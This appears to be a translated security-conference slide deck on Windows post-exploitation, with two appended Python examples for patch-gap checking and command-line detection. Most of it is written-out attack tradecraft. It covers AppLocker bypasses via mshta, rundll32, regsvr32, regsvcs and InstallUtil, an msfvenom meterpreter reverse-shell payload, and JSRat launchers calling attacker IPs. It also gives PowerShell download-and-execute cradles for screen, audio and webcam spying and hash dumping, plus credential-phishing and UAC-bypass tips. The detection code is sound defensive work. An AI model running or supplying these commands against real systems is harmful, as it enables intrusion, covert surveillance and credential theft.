Shell is Only the Beginning: Attack and Defence in the Post-Exploitation Phase
3gstudent & Evi1cg

"As an offensive researcher, if you can dream it, someone has likely already done it... and that someone isn't the kind of person who speaks at security cons." -- Matt Graeber

3gstudent: Good Study, Good Health, Good Attitude
Evi1cg: ThinWhiteHat, Security Researcher

Post-exploitation
- Penetration testing: take a specific business system as the target, identify the key infrastructure, and locate the information and assets the client organization values most and tries hardest to protect.
- Hacking: the process in which the attacker expands the results of the compromise as far as possible while hiding their own traces.

Contents
- Open a window: Open Proxy
- Get past the watchdog: Bypass Application Whitelisting
- Become the master: Escalate Privileges
- What is in the room: Gather Information
- Dig a secret passage: Persistence
- I will catch you: Detection and Mitigations

Open a window: Open Proxy

Why use a proxy?
- To reach the environment the target sits in.
- To use a machine you already have a shell on as a pivot and expand the foothold.
"It's the beginning."

Common methods
- Port forwarding: client tools Lcx, Netsh; HTTP: Tunnel; Metasploit: portfwd
- Socks proxy: client tools Ew, Xsocks; HTTP: reGeorg; Metasploit: socks4a
- VPN
- Other: SSH, ICMP, etc.

However, we may run into situations like these:
- Anti-virus software is installed and blocks "malicious" programs.
- An application whitelist is configured and programs outside it cannot run, e.g. Windows AppLocker.

Windows AppLocker
- Also known as "application control policies"; it controls executables, installers and scripts.
- Once the default rules are enabled, programs and scripts can only run from the default paths (the Windows and Program Files directories); every other path is blocked. That is why the techniques below either run attacker-supplied script through a signed system binary that is already allowed, or find a user-writable directory under an allowed path.

Get past the watchdog: Bypass Application Whitelisting

Approaches: Hta, Office Macro, Cpl, Chm, Powershell, Rundll32, Regsvr32, Regsvcs, Installutil

1. Hta
More:
  Mshta.exe vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
  Mshta.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}
The try/catch tail is the JSRat launcher pattern (fetch a response, eval it, otherwise kill the host process); with WScript.Shell rather than WinHttpRequest as h, h.Send() throws, so here the catch simply terminates mshta.exe after calc has been launched.

2. Office Macro
MacroRaptor: detect malicious VBA macros (Python) https://bitbucket.org/decalage/oletools/wiki/mraptor

3. Cpl
DLL/CPL: generate payload.dll:
  msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll
(1) Run the DLL directly: rundll32 shell32.dll,Control_RunDLL payload.dll
(2) Rename the DLL to .cpl and double-click it
(3) A plain DLL with its extension changed
From: http://drops.wooyun.org/tips/16042

4. Chm
"Advanced combination tricks: building the 'perfect' bundled backdoor": http://drops.wooyun.org/tips/14254
"Using system CHM files for a stealthy backdoor: the tricks we played back then"

5. Powershell
Command:
  powershell -nop -exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"
  Get-Content payload.ps1 | iex
  cmd.exe /K

8. Regsvcs / Regasm
key.snk:
  $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZBp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhBdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkBix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFBD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU/dzrGny5stQtTmLxdhZBOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FBdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIBoWsx4V8aiWx8FPPngEmNz89tBAQ8zBIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9B/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tBLZUefrFnLNiHfVjNi53Yg4='
  $Content = [System.Convert]::FromBase64String($key)
  Set-Content key.snk -Value $Content -Encoding Byte
Compile:
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs
Run:
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Regasm.dll
  OR
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe Regasm.dll
If you do not have administrator privileges, run with /U (the unregistration callback in the assembly still executes, but nothing has to be written to HKLM):
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U Regasm.dll
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Regasm.dll
From: https://gist.github.com/subTee/e1c54e1fdafc15674c9a

9. Installutil
InstallUtil:
Compile:
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs
After compiling, run it with the /U parameter (the Uninstall method of the Installer class runs, no admin rights needed):
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U InstallUtil.exe
From: http://subt0x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html  http://drops.wooyun.org/tips/8862

10. Executable directories
Scan for writable paths under the allowed directories with a PowerShell script. Script download: http://go.mssec.se/AppLockerBC
From: http://drops.wooyun.org/tips/11804

11. The most direct way: privilege escalation

Become the master: Escalate Privileges

Common privilege escalation approaches
- Local privilege escalation vulnerabilities
- Service-based
- Protocol-based
- Phishing

Local privilege escalation
Script that determines which vulnerabilities exist from the installed patch numbers: https://github.com/GDSSecurity/Windows-Exploit-Suggester
Export systeminfo on the victim machine to a file:
  systeminfo > 1.txt
Use the script to judge which vulnerabilities exist:
  python windows-exploit-suggester.py --database 2016-05-31-mssb.xls --systeminfo /Desktop/1.txt

A problem you may run into: the exploit gets caught by anti-virus! Port the exploit to PowerShell: http://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html
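The patch-gap check that Windows-Exploit-Suggester performs is simple enough to reimplement, and doing so shows what the tool is actually comparing. The block below is an added example, not the page's or GDSSecurity's code: it parses `systeminfo` text for the OS version and the installed KB numbers and reports bulletins whose fixing KB is absent. `SYSTEMINFO` is a constructed sample, and `BULLETINS` holds three hand-written rows standing in for the Microsoft bulletin spreadsheet (the 2016-05-31-mssb.xls on the page); the KB numbers in those rows are illustrative and must be checked against the spreadsheet before use.

```python
"""
Patch-gap check in the spirit of Windows-Exploit-Suggester (added example,
not the page's or GDSSecurity's own code).
"""
import re

# OS major.minor version -> (workstation product, server product).
# Keyed on the version number, not the OS name, so the check also works on
# Chinese (or any other localized) systeminfo output, which relabels the
# lines but keeps the numbers.
VERSION_TO_PRODUCT = {
    "6.0": ("Windows Vista", "Windows Server 2008"),
    "6.1": ("Windows 7", "Windows Server 2008 R2"),
    "6.2": ("Windows 8", "Windows Server 2012"),
    "6.3": ("Windows 8.1", "Windows Server 2012 R2"),
    "10.0": ("Windows 10", "Windows Server 2016"),
}

# Constructed sample of `systeminfo > 1.txt` from a Windows 7 SP1 x64 host.
SYSTEMINFO = """\
Host Name:                 WIN7-VICTIM
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Logon Server:              \\\\DC01
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2533552
                           [02]: KB3000061
                           [03]: KB3045171
"""

# Constructed bulletin rows: bulletin id, KB that fixes it, affected products.
# Illustrative values; verify each KB against the MSSB spreadsheet.
BULLETINS = [
    {"id": "MS14-058", "kb": "KB3000061",
     "products": {"Windows 7", "Windows Server 2008 R2"}},
    {"id": "MS15-051", "kb": "KB3045171",
     "products": {"Windows 7", "Windows Server 2008 R2"}},
    {"id": "MS16-032", "kb": "KB3139914",
     "products": {"Windows 7", "Windows Server 2008 R2"}},
]


def parse_systeminfo(text):
    """Return the product name, architecture and set of installed KBs."""
    ver = re.search(r":\s*(\d+\.\d+)\.\d+", text)        # first "x.y.z" value is OS Version
    major_minor = ver.group(1) if ver else None
    name = re.search(r"Microsoft Windows[^\r\n]*", text)  # product names stay English
    is_server = bool(name) and "Server" in name.group(0)
    products = VERSION_TO_PRODUCT.get(major_minor, ("unknown", "unknown"))
    return {
        "product": products[1] if is_server else products[0],
        "arch": "x64" if "x64-based" in text else "x86",
        "hotfixes": set(re.findall(r"\bKB\d{6,7}\b", text)),
    }


def missing_patches(text, bulletins=BULLETINS):
    """Bulletins that affect this product and whose fixing KB is not installed."""
    info = parse_systeminfo(text)
    return sorted(b["id"] for b in bulletins
                  if info["product"] in b["products"]
                  and b["kb"] not in info["hotfixes"])


if __name__ == "__main__":
    print(parse_systeminfo(SYSTEMINFO))
    print("possibly unpatched:", missing_patches(SYSTEMINFO))
```

Two caveats carry over to the real tool: a bulletin's KB can be superseded by a later cumulative update that `systeminfo` lists under a different number, so a reported gap is a lead to confirm, not proof of exploitability; and the result only says which bulletin is open, not whether the matching exploit survives the anti-virus on the host, which is the problem the PowerShell port above addresses.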
Demo Time

Service-based privilege escalation
- Common services: MSSQL, MySQL, Oracle, FTP
- Third-party services: DLL hijacking, file hijacking
- Privilege escalation script PowerUp: http://drops.wooyun.org/tips/11989

Protocol-based privilege escalation
Abuse known issues in Windows to obtain local privilege escalation: Potato. It relies on NTLM relay (specifically HTTP-to-SMB relay) and NBNS spoofing. Details: http://tools.pwn.ren/2016/01/17/potato-windows.html

Phishing
MSF "ask" module: exploit/windows/local/ask. It uses runas to prompt the user; if the user clicks through the UAC prompt, we obtain full privileges. MSF script that needs modifying: metasploit/lib/msf/core/post/windows/runas.rb

Phishing Demo

What is in the room: Gather Information

Gather Information
Now that we are the master, perhaps we should look at what is in the room. Two cases:
1. Already escalated to the highest privileges: do as you please.
2. Not escalated: the user is still protected by UAC and we cannot do everything yet.

Bypass UAC, common methods:
- The IFileOperation COM interface
- The extract option of Wusa.exe
- Remote injection of shellcode into a puppet process
- DLL hijacking: hijack a system DLL
- Escalate privileges directly, skipping UAC
- Phishing
http://evi1cg.me/archives/Powershell_Bypass_UAC.html  http://…

Tips
Pop up an authentication window from a script so the user types in their account and password, which hands us the plaintext password. PowerShell script as follows: From: https://…
Tips
MSF module post/windows/gather/phish_windows_credentials

More to look at
Installed Programs, Startup Items, Installed Services, File/Printer Shares, Database Servers, Certificate Authority, Security Services, Sensitive Data, Key-logging, Screen capture, Network traffic capture, User Information, System Configuration, Password Policy, Security Policies, Configured Wireless Networks and Keys

New attack methods: fileless

Fileless (1): PowerShell
Screen monitoring:
  powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://evi1cg.me/powershell/Show-TargetScreen.ps1');Show-TargetScreen"
Audio recording:
  powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://…'); … -Path $env:TEMP\secret.wav -Length 10 -Alias SECRET"
Webcam monitoring:
  powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://…'); … -RecordTime 2 -Path $env:temp\hack.avi"
Dumping hashes:
  powershell IEX (New-Object Net.WebClient).DownloadString('https://…')
  IEX (New-Object Net.WebClient).DownloadString('https://…')

Fileless (2): rundll32 JavaScript backdoor
  rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
From: JavaScript Backdoor http://drops.wooyun.org/tips/11764; JavaScript Phishing http://drops.wooyun.org/tips/12386

Fileless (3): mshta launching JSRat
  Mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.2.101:9998/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}

Fileless (4): sct
SCT (Calc.sct):
  regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll
From: Use SCT to Bypass Application Whitelisting Protection http://drops.wooyun.org/tips/15124

Fileless (5): wsc
WSC (Calc.wsc):
  rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://urlto/calc.wsc")
From: WSC, JSRAT and WMI Backdoor http://drops.wooyun.org/tips/15575

Demo Time

Dig a secret passage: Persistence

Common methods
- Startup items
- Registry
- WMI
- at
- schtasks
- Abusing existing third-party services

New method: Bitsadmin
- Requires administrator privileges
- Can run at boot and at intervals
- Works on Win7, Win8, Server 2008 and later
- Evades Autoruns' startup-item checks
- Reported to MSRC (Microsoft Security Response Center)

Demo Time

I will catch you: Detection and Mitigations

Detection and Mitigations
- bitsadmin /list /allusers /verbose
- Stop the Background Intelligent Transfer Service

Follow drops

Special thanks to Casey Smith (subTee)

Reference
1. "Shell is Only the Beginning": quote from Carlos Perez's blog http://…
2. Matt Graeber's idea: quote from https://…
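Every launcher in the whitelisting-bypass and fileless sections leaves a distinctive process-creation record, and the BITS persistence leaves one too, so the detection side of this talk can be expressed as a small rule set over command lines. The block below is an added example, not the authors' or any vendor's code. It runs over records of the shape Sysmon event 1 produces (image, command line, parent image); `EVENTS` is a constructed sample built from the one-liners on this page plus two benign look-alikes, the field and rule names are this example's own, and the BITS rule assumes the persistence variant hooks a job's notification command line (`bitsadmin /SetNotifyCmdLine`), a detail the slides leave to the demo.

```python
"""
Command-line detection rules for the LOLBin launchers on this page
(added example, not the page's own code).
"""
import ntpath
import re

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe",
                "rundll32.exe", "regsvr32.exe", "cmd.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def _exe(path):
    """Lower-cased basename of a Windows path (ntpath splits on backslashes on any OS)."""
    return ntpath.basename(path or "").lower()


def detect(event):
    """Return the names of the rules one process-creation record trips."""
    exe, parent = _exe(event["image"]), _exe(event.get("parent_image"))
    low = event["command_line"].lower()
    hits = []
    # mshta / rundll32 handed an inline javascript: or vbscript: URI
    # (HTA one-liners, the JSRat launcher, GetObject("script:...wsc"))
    if exe in {"mshta.exe", "rundll32.exe"} and re.search(r"\b(javascript|vbscript):", low):
        hits.append("inline_script_host")
    # regsvr32 /i:<url> scrobj.dll: remote scriptlet (SCT) execution
    if exe == "regsvr32.exe" and "scrobj.dll" in low and re.search(r'/i:\s*"?https?://', low):
        hits.append("regsvr32_remote_sct")
    # PowerShell download cradle: fetch text over HTTP, then IEX it
    if (exe == "powershell.exe"
            and re.search(r"downloadstring\(|downloadfile\(|invoke-webrequest", low)
            and re.search(r"\biex\b|invoke-expression", low)):
        hits.append("powershell_download_cradle")
    # InstallUtil /U, Regsvcs /U, Regasm /U: code from an arbitrary assembly, no admin rights
    if exe in {"installutil.exe", "regsvcs.exe", "regasm.exe"} and re.search(r"\s/u\b", low):
        hits.append("dotnet_uninstall_switch")
    # rundll32 shell32.dll,Control_RunDLL <target> with the target outside %SystemRoot% (CPL/DLL payload)
    m = re.search(r'control_rundll\s+(?:"([^"]+)"|(\S+))', low)
    if exe == "rundll32.exe" and m and not (m.group(1) or m.group(2)).startswith("c:\\windows\\"):
        hits.append("control_rundll_outside_windows")
    # BITS job given a notification command: assumed hook of the bitsadmin persistence
    if exe == "bitsadmin.exe" and "/setnotifycmdline" in low:
        hits.append("bits_notify_cmdline")
    # An Office application spawning a script host: macro execution
    if parent in OFFICE_APPS and exe in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    return hits


def scan(events):
    """Map each record id to the rules it trips; records with no hits are omitted."""
    return {ev["id"]: hits for ev in events if (hits := detect(ev))}


SYS32 = r"C:\Windows\System32"
CMD = SYS32 + r"\cmd.exe"
PS = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records (ids 9 and 10 are benign look-alikes).
EVENTS = [
    {"id": 1, "image": SYS32 + r"\mshta.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'mshta.exe vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)'},
    {"id": 2, "image": SYS32 + r"\rundll32.exe", "parent_image": CMD,
     "command_line": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'},
    {"id": 3, "image": SYS32 + r"\regsvr32.exe", "parent_image": CMD,
     "command_line": r"regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll"},
    {"id": 4, "image": PS, "parent_image": CMD,
     "command_line": 'powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(\'http://evi1cg.me/powershell/Show-TargetScreen.ps1\');Show-TargetScreen"'},
    {"id": 5, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe", "parent_image": CMD,
     "command_line": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U Regasm.dll"},
    {"id": 6, "image": SYS32 + r"\rundll32.exe", "parent_image": CMD,
     "command_line": r"rundll32 shell32.dll,Control_RunDLL payload.dll"},
    {"id": 7, "image": SYS32 + r"\bitsadmin.exe", "parent_image": CMD,
     "command_line": r'bitsadmin /SetNotifyCmdLine backup "C:\Users\Public\update.exe" NULL'},
    {"id": 8, "image": PS, "parent_image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "command_line": 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://192.168.2.101:9998/connect\')"'},
    {"id": 9, "image": SYS32 + r"\regsvr32.exe", "parent_image": SYS32 + r"\msiexec.exe",
     "command_line": r"regsvr32 /s C:\Windows\System32\jscript.dll"},
    {"id": 10, "image": SYS32 + r"\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'rundll32.exe shell32.dll,Control_RunDLL "C:\Windows\System32\inetcpl.cpl"'},
]

if __name__ == "__main__":
    for rec_id, hits in scan(EVENTS).items():
        print(rec_id, hits)
```

The `/U` rule is the noisy one: administrators do uninstall assemblies with InstallUtil and Regasm, so treat it as a lead to be joined with the parent process and the assembly's path rather than an alert on its own. The rules also say nothing about a job already planted; for that the slide's `bitsadmin /list /allusers /verbose` (run as an administrator, otherwise other users' jobs are not shown) remains the check.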